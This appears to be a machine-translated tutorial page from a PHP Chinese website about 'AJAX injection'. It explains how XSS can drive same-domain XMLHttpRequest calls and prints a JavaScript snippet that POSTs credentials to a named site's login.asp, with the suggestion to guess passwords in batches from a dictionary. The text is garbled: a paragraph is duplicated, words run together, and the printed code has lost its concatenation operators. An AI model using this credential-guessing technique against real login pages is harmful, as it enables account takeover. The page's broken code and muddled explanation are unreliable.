This time I will bring you a detailed explanation of the use of AJAX injection. What are theprecautionswhen using AJAX injection? The following is a practical case, let's take a look.
AJAX can allow data to be processed silently in the background. If there is a way to make your JS script and the AJAX module in the same domain, you can use this XSS to complete the secondary attack, and You can judge whether the returned result is correct or not by using the status attribute of the XHRobject. GET type AJAX directly constructs the parameter values in the URL; POST type AJAX constructs the send method of the XHR object AJAX can allow data to be processed silently in the background. If there is a way to make your JS script and this AJAX module in the same domain, you can use this XSS to complete the secondary attack, and you can judge it through the status attribute of the XHR object Returns whether the result is correct or not. GET type AJAX directly constructs the parameter values in the URL; POST type AJAX constructs the parameter values in the send method of the XHR object.
Generally, attacks using AJAX are difficult to detect by users unless we want them to detect them. The plug-infirebugin firefox can analyze all actions of XHR:
How tosecuritydetect AJAXmodularweb programs in the local domain?
Although AJAX cannot directly transfer data across domains, you can transfer data with the target AJAX module in the local domain. Let’s do an experiment with my To Do/Project, the following code:
alert(_x)
function check_login(){ var up="up=" escape('余弦') "|" "1234567"; _x.open("POST","http://www.0x37.com/Project/login.asp",true); _x.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); _x.onreadystatechange=function() { if(_x.readyState==4) { if(_x.status==200) { alert(_x.responseText); } } } _x.send(up); } check_login(); //logout();
After submitting this code locally, it will match the login.asp file on the 0x37 Project For communication, its function is to guess the user name and password, and judge whether it is correct based on the return value. If there is a dictionary, then you can guess the passwords in batches. This kind of communication is normal. The malicious value we constructed is injected in this AJAX box. Of course, we can also directly detect the target URL in AJAX. Although AJAX "hides" many server-side files, this does not mean that these server-side files are safe, and may expose more serious problems.
I believe you have mastered the method after reading the case in this article. For more exciting information, please pay attention to other related articles on the php Chinese website!
Recommended reading:
Detailed explanation of the steps for Jquery to operate js arrays and objects
A collection of methods for jquery to traverse and filter arrays and json objects
The above is the detailed content of Detailed explanation of AJAX injection usage. For more information, please follow other related articles on the PHP Chinese website!